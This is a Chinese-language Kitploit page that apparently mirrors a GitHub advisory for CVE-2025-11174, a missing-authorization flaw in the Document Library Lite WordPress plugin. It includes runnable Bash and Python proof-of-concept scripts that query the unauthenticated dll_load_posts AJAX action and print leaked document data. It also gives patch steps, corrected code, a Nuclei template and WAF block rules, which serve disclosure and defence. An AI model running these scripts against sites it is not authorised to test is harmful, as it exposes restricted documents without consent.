Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-11174 — Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174 | Kitploit
工具/GitHubGitHub/snailsploit/cve-2025-11174
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174

查看仓库
3个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-11174: Document Library Lite WordPress插件中的未认证信息泄露漏洞

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

关键词: CVE-2025-11174, Document Library Lite漏洞, 信息泄露, WordPress安全, 未认证AJAX利用, WordPress插件漏洞, CWE-862, WordPress文档插件安全, 授权绕过, WordPress CVE 2025

目录

  • 概述
  • 漏洞详情
  • 技术分析
  • 攻击向量
  • 概念验证
  • 修复指南
  • 检测
  • CVSS指标
  • 参考
  • 致谢
  • 安全联系

概述

Document Library Lite WordPress插件信息泄露漏洞 (CVE-2025-11174) – 允许未认证攻击者访问WordPress文档库插件中敏感文档数据的安全缺陷。

在Document Library Lite WordPress插件中发现了一个严重的授权绕过漏洞,允许未认证攻击者在未通过认证的情况下访问敏感文档信息。

发现者: Kai Aizen & Avraham Shemesh (SnailSploit)
发布: 2025年11月1日
CVSS评分: 5.3 (中等)
CWE: CWE-862 - 缺少授权
插件: Document Library Lite
供应商: Barn2 Plugins
攻击类型: 未认证信息泄露
所需权限: 无 (未认证攻击)

漏洞详情

描述

Document Library Lite WordPress插件在所有版本(包括1.1.6及之前版本)中存在授权不当的漏洞。该插件暴露了一个未认证的AJAX动作dll_load_posts,该动作在没有执行nonce或权限检查的情况下返回文档数据的JSON表格。

影响

该漏洞允许未认证攻击者:

  • 未经授权访问文档元数据
  • 检索本应受限制的文档列表
  • 查看仅限认证用户访问的文档信息
  • 枚举文档库中存储的文档

注意: CVSS评分5.3(中等严重性)反映了有限的信息泄露。虽然该漏洞允许未认证访问文档数据,但保密性影响被评为低级,对完整性和可用性无影响。

受影响的版本

  • 受影响: 所有版本 ≤ 1.1.6
  • 已修复: 版本 1.1.7 及更高版本

CVSS v3.1指标

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVSS v3.1 分解:

  • 攻击向量 (AV): 网络 – 可通过网络远程利用此漏洞
  • 攻击复杂度 (AC): 低 – 无需特殊条件即可利用
  • 所需权限 (PR): 无 – 无需认证或权限
  • 用户交互 (UI): 无 – 无需用户交互即可利用
  • 范围 (S): 未改变 – 漏洞仅影响易受攻击的组件
  • 保密性影响 (C): 低 – 有限的信息泄露
  • 完整性影响 (I): 无 – 无完整性影响
  • 可用性影响 (A): 无 – 无可用性影响

技术分析

漏洞根本原因

AJAX动作dll_load_posts在注册时未进行适当的认证或授权检查:

root@kitploit:~
// 漏洞代码模式(简化)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');

wp_ajax_nopriv_前缀表示该动作对未认证用户可访问,并且回调函数未实现:

  • Nonce验证
  • 权限检查
  • 用户认证验证

攻击向量

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=dll_load_posts

该漏洞可通过WordPress的admin-ajax.php端点利用,无需认证。

概念验证

⚠️ 仅用于教育和授权测试目的

Bash PoC

root@kitploit:~
#!/bin/bash
# CVE-2025-11174 PoC

TARGET_URL="$1"

if [ -z "$TARGET_URL" ]; then
    echo "Usage: $0 <target_url>"
    echo "Example: $0 https://example.com"
    exit 1
fi

echo "[*] CVE-2025-11174 - Document Library Lite 信息泄露 PoC"
echo "[*] 目标: $TARGET_URL"
echo ""

# 向易受攻击的AJAX端点发送请求
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=dll_load_posts" \
  | python3 -m json.tool

echo ""
echo "[+] 如果您看到上方出现了文档数据,则该站点存在漏洞!"

Python PoC

root@kitploit:~
#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite 信息泄露 PoC
仅用于教育和授权测试目的
"""

import requests
import sys
import json

def exploit(target_url):
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
    print(f"[*] 目标: {target_url}")
    print(f"[*] AJAX端点: {ajax_url}\n")
    
    data = {'action': 'dll_load_posts'}
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] 请求成功!\n")
            try:
                json_data = response.json()
                print("[+] 获取到的文档数据:")
                print(json.dumps(json_data, indent=2))
                print("\n[!] 站点存在 CVE-2025-11174 漏洞!")
            except json.JSONDecodeError:
                print("[-] 未收到JSON响应")
                print(f"响应: {response.text[:200]}")
        else:
            print(f"[-] 请求失败,状态码: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] 错误: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"用法: {sys.argv[0]} <目标URL>")
        print(f"示例: {sys.argv[0]} https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)

修复指南

站点管理员

需要立即采取的措施:

  1. 立即更新Document Library Lite到1.1.7或更高版本
  2. 检查站点访问日志中是否存在带有action=dll_load_posts的可疑POST请求到admin-ajax.php
  3. 如果无法立即更新,考虑临时禁用该插件

更新说明

通过WordPress管理后台:

  1. 导航到WordPress管理后台的插件 > 已安装插件
  2. 找到“Document Library Lite”
  3. 点击立即更新以升级到1.1.7或更高版本
  4. 确认更新成功

使用WP-CLI:

root@kitploit:~
wp plugin update document-library-lite

插件开发者

确保所有AJAX处理器实现适当的安全控制:

root@kitploit:~
// 正确AJAX安全的示例
add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');

function dll_load_posts_callback() {
    // 验证nonce
    if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
        wp_die('无效的nonce');
    }
    
    // 检查权限
    if (!current_user_can('read')) {
        wp_send_json_error('权限不足');
        wp_die();
    }
    
    // 您的安全代码在此
}

检测

WordPress插件检查

root@kitploit:~
# 检查是否安装了易受攻击的版本
wp plugin list | grep -i "document-library-lite"

安全扫描器规则

Nuclei模板:

root@kitploit:~
id: CVE-2025-11174

info:
  name: Document Library Lite - 未认证信息泄露
  author: security-research
  severity: medium
  description: Document Library Lite WordPress插件易受信息泄露攻击
  reference:
    - https://github.com/[your-repo]/CVE-2025-11174
  tags: cve,cve2025,wordpress,wp-plugin,unauth

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php"
    
    body: "action=dll_load_posts"
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "data"
          - "recordsTotal"
        condition: and
      
      - type: status
        status:
          - 200

Web应用防火墙规则

ModSecurity规则:

root@kitploit:~
SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
    "chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
    log,deny,status:403,msg:'CVE-2025-11174 利用尝试'"
    SecRule ARGS:action "@streq dll_load_posts" "t:none"

Nginx/OpenResty规则:

root@kitploit:~
if ($request_uri ~* "admin-ajax\.php") {
    if ($args ~* "action=dll_load_posts") {
        return 403;
    }
}

时间线

  • 2025年11月1日 – 漏洞公开披露
  • 2025年11月1日 – CVE记录发布
  • 2025年11月 – 发布补丁(版本1.1.7)

参考

  • CVE-2025-11174 - CVE.org
  • GitHub安全公告数据库
  • Wordfence威胁情报
  • WordPress插件目录

致谢

研究人员:

  • Avraham Shemesh
  • Kai Aizen - SnailSploit

披露流程: 协调披露

免责声明

此信息仅供安全研究和防御目的使用。任何恶意利用此漏洞的行为都是非法且不道德的。在测试您不拥有的系统之前,请始终获得适当的授权。

联系

如有关于此漏洞的问题或更多信息:

  • 邮箱: [email protected]
  • 网站: snailsploit.com
  • 组织: SnailSploit安全研究

最后更新:2025年11月2日


📚 文档与作者

此项目的完整报告、方法论及相关研究位于:

https://snailsploit.com/security-research/cves/cve-2025-11174/

由 Kai Aizen 创建 — 独立进攻性安全研究员。

snailsploit.com · 研究 · 框架 · GitHub · LinkedIn · ResearchGate · X/Twitter

同样的攻击。不同的基底。

下载工具
指标值
攻击向量网络 (AV:N)
攻击复杂度低 (AC:L)
所需权限无 (PR:N)
用户交互无 (UI:N)
范围未改变 (S:U)
保密性低 (C:L)
完整性无 (I:N)
可用性无 (A:N)